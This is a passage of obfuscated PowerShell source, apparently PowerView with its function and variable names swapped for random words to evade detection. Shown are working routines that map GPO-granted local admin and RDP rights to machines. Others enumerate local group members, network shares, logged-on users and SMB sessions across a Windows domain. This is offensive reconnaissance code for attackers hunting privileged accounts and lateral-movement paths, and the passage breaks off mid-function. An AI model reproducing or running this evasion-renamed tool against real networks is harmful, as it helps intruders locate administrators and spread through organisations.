Write-Verbose "[Deuteronomy] Enumerating nested group memberships for: '$CHKYAbAI99'" | |
$htZjqJmH99 += lariat @CommonArguments -nmZxBYze99 'objectsid' -AquLEsHm99 $CHKYAbAI99 | Select-Object -ExpandProperty objectsid | |
} | |
} | |
Write-Verbose "[Deuteronomy] Target localgroup SID: $MSROXiWs99" | |
Write-Verbose "[Deuteronomy] Effective target domain SIDs: $htZjqJmH99" | |
$tuMTsirr99 = symbolization @CommonArguments -dvmwaZmM99 | ForEach-Object { | |
$OlYeNaWL99 = $_ | |
if ($OlYeNaWL99.GroupSID -match $MSROXiWs99) { | |
$OlYeNaWL99.GroupMembers | Where-Object {$_} | ForEach-Object { | |
if ( ($htZjqJmH99[0] -eq '*') -or ($htZjqJmH99 -Contains $_) ) { | |
$OlYeNaWL99 | |
} | |
} | |
} | |
if ( ($OlYeNaWL99.GroupMemberOf -contains $MSROXiWs99) ) { | |
if ( ($htZjqJmH99[0] -eq '*') -or ($htZjqJmH99 -Contains $OlYeNaWL99.GroupSID) ) { | |
$OlYeNaWL99 | |
} | |
} | |
} | Sort-Object -Property GPOName -Unique | |
$tuMTsirr99 | Where-Object {$_} | ForEach-Object { | |
$rVwWCmiO99 = $_.GPODisplayName | |
$AVduZXbT99 = $_.GPOName | |
$TqcfsIBD99 = $_.GPOPath | |
$XPuYsZNu99 = $_.GPOType | |
if ($_.GroupMembers) { | |
$jaPoNaZY99 = $_.GroupMembers | |
} | |
else { | |
$jaPoNaZY99 = $_.GroupSID | |
} | |
$qQKkMdVy99 = $_.Filters | |
if ($htZjqJmH99[0] -eq '*') { | |
$qpSSHowf99 = $jaPoNaZY99 | |
} | |
else { | |
$qpSSHowf99 = $gsUmfyKw99 | |
} | |
stancher @CommonArguments -Raw -nmZxBYze99 'name,distinguishedname' -DGgEtKNM99 $AVduZXbT99 | ForEach-Object { | |
if ($qQKkMdVy99) { | |
$WrpZjLpE99 = deputes @CommonArguments -nmZxBYze99 'dnshostname,distinguishedname' -GNYlaBrE99 $_.Path | Where-Object {$_.distinguishedname -match ($qQKkMdVy99.Value)} | Select-Object -ExpandProperty dnshostname | |
} | |
else { | |
$WrpZjLpE99 = deputes @CommonArguments -nmZxBYze99 'dnshostname' -GNYlaBrE99 $_.Path | Select-Object -ExpandProperty dnshostname | |
} | |
if ($WrpZjLpE99) { | |
if ($WrpZjLpE99 -isnot [System.Array]) {$WrpZjLpE99 = @($WrpZjLpE99)} | |
ForEach ($CHKYAbAI99 in $qpSSHowf99) { | |
$Object = sniffling @CommonArguments -mxWgOMSt99 $CHKYAbAI99 -nmZxBYze99 'samaccounttype,samaccountname,distinguishedname,objectsid' | |
$MAoHpWjq99 = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype | |
$FzuerINN99 = New-Object PSObject | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectName' $Object.samaccountname | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectSID' $Object.objectsid | |
$FzuerINN99 | Add-Member Noteproperty 'Domain' $ADDDGomQ99 | |
$FzuerINN99 | Add-Member Noteproperty 'IsGroup' $MAoHpWjq99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPODisplayName' $rVwWCmiO99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOGuid' $AVduZXbT99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOPath' $TqcfsIBD99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOType' $XPuYsZNu99 | |
$FzuerINN99 | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname | |
$FzuerINN99 | Add-Member Noteproperty 'ComputerName' $WrpZjLpE99 | |
$FzuerINN99.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping') | |
$FzuerINN99 | |
} | |
} | |
} | |
billionaire @CommonArguments -nmZxBYze99 'siteobjectbl,distinguishedname' -DGgEtKNM99 $AVduZXbT99 | ForEach-Object { | |
ForEach ($CHKYAbAI99 in $qpSSHowf99) { | |
$Object = sniffling @CommonArguments -mxWgOMSt99 $CHKYAbAI99 -nmZxBYze99 'samaccounttype,samaccountname,distinguishedname,objectsid' | |
$MAoHpWjq99 = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype | |
$FzuerINN99 = New-Object PSObject | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectName' $Object.samaccountname | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname | |
$FzuerINN99 | Add-Member Noteproperty 'ObjectSID' $Object.objectsid | |
$FzuerINN99 | Add-Member Noteproperty 'IsGroup' $MAoHpWjq99 | |
$FzuerINN99 | Add-Member Noteproperty 'Domain' $ADDDGomQ99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPODisplayName' $rVwWCmiO99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOGuid' $AVduZXbT99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOPath' $TqcfsIBD99 | |
$FzuerINN99 | Add-Member Noteproperty 'GPOType' $XPuYsZNu99 | |
$FzuerINN99 | Add-Member Noteproperty 'ContainerName' $_.distinguishedname | |
$FzuerINN99 | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl | |
$FzuerINN99.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping') | |
$FzuerINN99 | |
} | |
} | |
} | |
} | |
} | |
function dissatisfying { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.GGPOComputerLocalGroupMember')] | |
[CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')] | |
Param( | |
[Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')] | |
[String] | |
$FoYcJhqt99, | |
[Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')] | |
[Alias('OU')] | |
[String] | |
$GpoqdsTl99, | |
[String] | |
[ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] | |
$ifkgdQea99 = 'Administrators', | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$pdpolLiZ99 = @{} | |
if ($PSBoundParameters['Domain']) { $pdpolLiZ99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $pdpolLiZ99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $pdpolLiZ99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $pdpolLiZ99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $pdpolLiZ99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $pdpolLiZ99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $pdpolLiZ99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['ComputerIdentity']) { | |
$ZaxKAhGg99 = deputes @CommonArguments -mxWgOMSt99 $FoYcJhqt99 -nmZxBYze99 'distinguishedname,dnshostname' | |
if (-not $ZaxKAhGg99) { | |
throw "[dissatisfying] Computer $FoYcJhqt99 not found. Try a fully qualified host name." | |
} | |
ForEach ($GrySniik99 in $ZaxKAhGg99) { | |
$ozMxMluR99 = @() | |
$DN = $GrySniik99.distinguishedname | |
$KgWVkbAk99 = $DN.IndexOf('OU=') | |
if ($KgWVkbAk99 -gt 0) { | |
$znDmMQZM99 = $DN.SubString($KgWVkbAk99) | |
} | |
if ($znDmMQZM99) { | |
$ozMxMluR99 += stancher @CommonArguments -GNYlaBrE99 $znDmMQZM99 -hzaXgjDv99 '(gplink=*)' | ForEach-Object { | |
Select-String -MdtHuWsJ99 $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } | |
} | |
} | |
Write-Verbose "Enumerating the sitename for: $($GrySniik99.dnshostname)" | |
$HNDQqiGm99 = (passionless -MqGzGCsi99 $GrySniik99.dnshostname).SiteName | |
if ($HNDQqiGm99 -and ($HNDQqiGm99 -notmatch 'Error')) { | |
$ozMxMluR99 += billionaire @CommonArguments -mxWgOMSt99 $HNDQqiGm99 -hzaXgjDv99 '(gplink=*)' | ForEach-Object { | |
Select-String -MdtHuWsJ99 $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } | |
} | |
} | |
$ozMxMluR99 | symbolization @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object { | |
$OlYeNaWL99 = $_ | |
if($OlYeNaWL99.GroupMembers) { | |
$jaPoNaZY99 = $OlYeNaWL99.GroupMembers | |
} | |
else { | |
$jaPoNaZY99 = $OlYeNaWL99.GroupSID | |
} | |
$jaPoNaZY99 | ForEach-Object { | |
$Object = sniffling @CommonArguments -mxWgOMSt99 $_ | |
$MAoHpWjq99 = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype | |
$vjOrOPmM99 = New-Object PSObject | |
$vjOrOPmM99 | Add-Member Noteproperty 'ComputerName' $GrySniik99.dnshostname | |
$vjOrOPmM99 | Add-Member Noteproperty 'ObjectName' $Object.samaccountname | |
$vjOrOPmM99 | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname | |
$vjOrOPmM99 | Add-Member Noteproperty 'ObjectSID' $_ | |
$vjOrOPmM99 | Add-Member Noteproperty 'IsGroup' $MAoHpWjq99 | |
$vjOrOPmM99 | Add-Member Noteproperty 'GPODisplayName' $OlYeNaWL99.GPODisplayName | |
$vjOrOPmM99 | Add-Member Noteproperty 'GPOGuid' $OlYeNaWL99.GPOName | |
$vjOrOPmM99 | Add-Member Noteproperty 'GPOPath' $OlYeNaWL99.GPOPath | |
$vjOrOPmM99 | Add-Member Noteproperty 'GPOType' $OlYeNaWL99.GPOType | |
$vjOrOPmM99.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember') | |
$vjOrOPmM99 | |
} | |
} | |
} | |
} | |
} | |
} | |
function sanity { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([Hashtable])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Source', 'Name')] | |
[String] | |
$LmxtkWWm99 = 'Domain', | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$pQxPRCuR99 = @{} | |
if ($PSBoundParameters['Server']) { $pQxPRCuR99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $pQxPRCuR99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['Domain']) { | |
$ufgcNRNN99['Domain'] = $ADDDGomQ99 | |
$pQxPRCuR99['Domain'] = $ADDDGomQ99 | |
} | |
if ($LmxtkWWm99 -eq 'All') { | |
$ufgcNRNN99['Identity'] = '*' | |
} | |
elseif ($LmxtkWWm99 -eq 'Domain') { | |
$ufgcNRNN99['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}' | |
} | |
elseif (($LmxtkWWm99 -eq 'DomainController') -or ($LmxtkWWm99 -eq 'DC')) { | |
$ufgcNRNN99['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}' | |
} | |
else { | |
$ufgcNRNN99['Identity'] = $LmxtkWWm99 | |
} | |
$PqhwqQsA99 = gutsy @SearcherArguments | |
ForEach ($GPO in $PqhwqQsA99) { | |
$LZmMtsJE99 = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" | |
$ojSfAipd99 = @{ | |
'GptTmplPath' = $LZmMtsJE99 | |
'OutputObject' = $True | |
} | |
if ($PSBoundParameters['Credential']) { $ojSfAipd99['Credential'] = $KWcDeQDF99 } | |
stupefy @ParseArgs | ForEach-Object { | |
$_ | Add-Member Noteproperty 'GPOName' $GPO.name | |
$_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname | |
$_ | |
} | |
} | |
} | |
} | |
function sluggishness { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.LocalGroup.API')] | |
[OutputType('PowerView.LocalGroup.WinNT')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = $Env:COMPUTERNAME, | |
[ValidateSet('API', 'WinNT')] | |
[Alias('CollectionMethod')] | |
[String] | |
$vjFnrNGz99 = 'API', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
if ($vjFnrNGz99 -eq 'API') { | |
$PGubCFXf99 = 1 | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$GdEWWWOc99 = 0 | |
$meeMzfjM99 = 0 | |
$uESWvgQq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::NetLocalGroupEnum($GrySniik99, $PGubCFXf99, [ref]$wOXUIqWw99, -1, [ref]$GdEWWWOc99, [ref]$meeMzfjM99, [ref]$uESWvgQq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $LLOqjUdw99::GetSize() | |
for ($i = 0; ($i -lt $GdEWWWOc99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $LLOqjUdw99 | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$ifkgdQea99 = New-Object PSObject | |
$ifkgdQea99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$ifkgdQea99 | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name | |
$ifkgdQea99 | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment | |
$ifkgdQea99.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API') | |
$ifkgdQea99 | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
} | |
else { | |
Write-Verbose "[sluggishness] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
else { | |
$UfASKpBu99 = [ADSI]"WinNT://$GrySniik99,computer" | |
$UfASKpBu99.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { | |
$ifkgdQea99 = ([ADSI]$_) | |
$Group = New-Object PSObject | |
$Group | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$Group | Add-Member Noteproperty 'GroupName' ($ifkgdQea99.InvokeGet('Name')) | |
$Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($ifkgdQea99.InvokeGet('objectsid'),0)).Value) | |
$Group | Add-Member Noteproperty 'Comment' ($ifkgdQea99.InvokeGet('Description')) | |
$Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT') | |
$Group | |
} | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function toehold { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.LocalGroupMember.API')] | |
[OutputType('PowerView.LocalGroupMember.WinNT')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = $Env:COMPUTERNAME, | |
[Parameter(ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ekAEczJN99 = 'Administrators', | |
[ValidateSet('API', 'WinNT')] | |
[Alias('CollectionMethod')] | |
[String] | |
$vjFnrNGz99 = 'API', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
if ($vjFnrNGz99 -eq 'API') { | |
$PGubCFXf99 = 2 | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$GdEWWWOc99 = 0 | |
$meeMzfjM99 = 0 | |
$uESWvgQq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::NetLocalGroupGetMembers($GrySniik99, $ekAEczJN99, $PGubCFXf99, [ref]$wOXUIqWw99, -1, [ref]$GdEWWWOc99, [ref]$meeMzfjM99, [ref]$uESWvgQq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
$aETbShlY99 = @() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $kYoIWcmM99::GetSize() | |
for ($i = 0; ($i -lt $GdEWWWOc99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $kYoIWcmM99 | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$QgefhFUQ99 = '' | |
$mosihINr99 = $OTnzYMIG99::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$QgefhFUQ99);$boIzopBu99 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() | |
if ($mosihINr99 -eq 0) { | |
Write-Verbose "[toehold] Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
else { | |
$gPVoRuJA99 = New-Object PSObject | |
$gPVoRuJA99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$gPVoRuJA99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$gPVoRuJA99 | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname | |
$gPVoRuJA99 | Add-Member Noteproperty 'SID' $QgefhFUQ99 | |
$MAoHpWjq99 = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup') | |
$gPVoRuJA99 | Add-Member Noteproperty 'IsGroup' $MAoHpWjq99 | |
$gPVoRuJA99.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API') | |
$aETbShlY99 += $gPVoRuJA99 | |
} | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
$QhUzQgeO99 = $aETbShlY99 | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID | |
if ($QhUzQgeO99) { | |
$QhUzQgeO99 = $QhUzQgeO99.Substring(0, $QhUzQgeO99.LastIndexOf('-')) | |
$aETbShlY99 | ForEach-Object { | |
if ($_.SID -match $QhUzQgeO99) { | |
$_ | Add-Member Noteproperty 'IsDomain' $False | |
} | |
else { | |
$_ | Add-Member Noteproperty 'IsDomain' $True | |
} | |
} | |
} | |
else { | |
$aETbShlY99 | ForEach-Object { | |
if ($_.SID -notmatch 'S-1-5-21') { | |
$_ | Add-Member Noteproperty 'IsDomain' $False | |
} | |
else { | |
$_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN' | |
} | |
} | |
} | |
$aETbShlY99 | |
} | |
else { | |
Write-Verbose "[toehold] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
else { | |
try { | |
$sOaWUXqs99 = [ADSI]"WinNT://$GrySniik99/$ekAEczJN99,group" | |
$sOaWUXqs99.psbase.Invoke('Members') | ForEach-Object { | |
$gPVoRuJA99 = New-Object PSObject | |
$gPVoRuJA99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$gPVoRuJA99 | Add-Member Noteproperty 'GroupName' $ekAEczJN99 | |
$qwNtCuDF99 = ([ADSI]$_) | |
$DmtcsODY99 = $qwNtCuDF99.InvokeGet('AdsPath').Replace('WinNT://', '') | |
$MAoHpWjq99 = ($qwNtCuDF99.SchemaClassName -like 'group') | |
if(([regex]::Matches($DmtcsODY99, '/')).count -eq 1) { | |
$EFJAXDwm99 = $True | |
$Name = $DmtcsODY99.Replace('/', '\') | |
} | |
else { | |
$EFJAXDwm99 = $False | |
$Name = $DmtcsODY99.Substring($DmtcsODY99.IndexOf('/')+1).Replace('/', '\') | |
} | |
$gPVoRuJA99 | Add-Member Noteproperty 'AccountName' $Name | |
$gPVoRuJA99 | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($qwNtCuDF99.InvokeGet('ObjectSID'),0)).Value) | |
$gPVoRuJA99 | Add-Member Noteproperty 'IsGroup' $MAoHpWjq99 | |
$gPVoRuJA99 | Add-Member Noteproperty 'IsDomain' $EFJAXDwm99 | |
$gPVoRuJA99 | |
} | |
} | |
catch { | |
Write-Verbose "[toehold] Error for $GrySniik99 : $_" | |
} | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function snarkier { | |
[OutputType('PowerView.ShareInfo')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$PGubCFXf99 = 1 | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$GdEWWWOc99 = 0 | |
$meeMzfjM99 = 0 | |
$uESWvgQq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::NetShareEnum($GrySniik99, $PGubCFXf99, [ref]$wOXUIqWw99, -1, [ref]$GdEWWWOc99, [ref]$meeMzfjM99, [ref]$uESWvgQq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $FJrogxQA99::GetSize() | |
for ($i = 0; ($i -lt $GdEWWWOc99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $FJrogxQA99 | |
$Share = $Info | Select-Object * | |
$Share | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo') | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$Share | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
} | |
else { | |
Write-Verbose "[snarkier] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function clickable { | |
[OutputType('PowerView.LoggedOnUserInfo')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$PGubCFXf99 = 1 | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$GdEWWWOc99 = 0 | |
$meeMzfjM99 = 0 | |
$uESWvgQq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::NetWkstaUserEnum($GrySniik99, $PGubCFXf99, [ref]$wOXUIqWw99, -1, [ref]$GdEWWWOc99, [ref]$meeMzfjM99, [ref]$uESWvgQq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $bduiPbAY99::GetSize() | |
for ($i = 0; ($i -lt $GdEWWWOc99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $bduiPbAY99 | |
$uEoImVtx99 = $Info | Select-Object * | |
$uEoImVtx99 | Add-Member Noteproperty 'ComputerName' $GrySniik99 | |
$uEoImVtx99.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo') | |
$iSpjhTbK99 = $AvQbhhmy99.ToInt64() | |
$iSpjhTbK99 += $KDfRICkF99 | |
$uEoImVtx99 | |
} | |
$Null = $jXhUbjcF99::NetApiBufferFree($wOXUIqWw99) | |
} | |
else { | |
Write-Verbose "[clickable] Error: $(([ComponentModel.Win32Exception] $jdzRPRXs99).Message)" | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function Ukrainians { | |
[OutputType('PowerView.SessionInfo')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = 'localhost', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$PGubCFXf99 = 10 | |
$wOXUIqWw99 = [IntPtr]::Zero | |
$GdEWWWOc99 = 0 | |
$meeMzfjM99 = 0 | |
$uESWvgQq99 = 0 | |
$jdzRPRXs99 = $jXhUbjcF99::NetSessionEnum($GrySniik99, '', $bnjyYveg99, $PGubCFXf99, [ref]$wOXUIqWw99, -1, [ref]$GdEWWWOc99, [ref]$meeMzfjM99, [ref]$uESWvgQq99) | |
$iSpjhTbK99 = $wOXUIqWw99.ToInt64() | |
if (($jdzRPRXs99 -eq 0) -and ($iSpjhTbK99 -gt 0)) { | |
$KDfRICkF99 = $tmhYWOvK99::GetSize() | |
for ($i = 0; ($i -lt $GdEWWWOc99); $i++) { | |
$AvQbhhmy99 = New-Object System.Intptr -ArgumentList $iSpjhTbK99 | |
$Info = $AvQbhhmy99 -as $tmhYWOvK99 | |
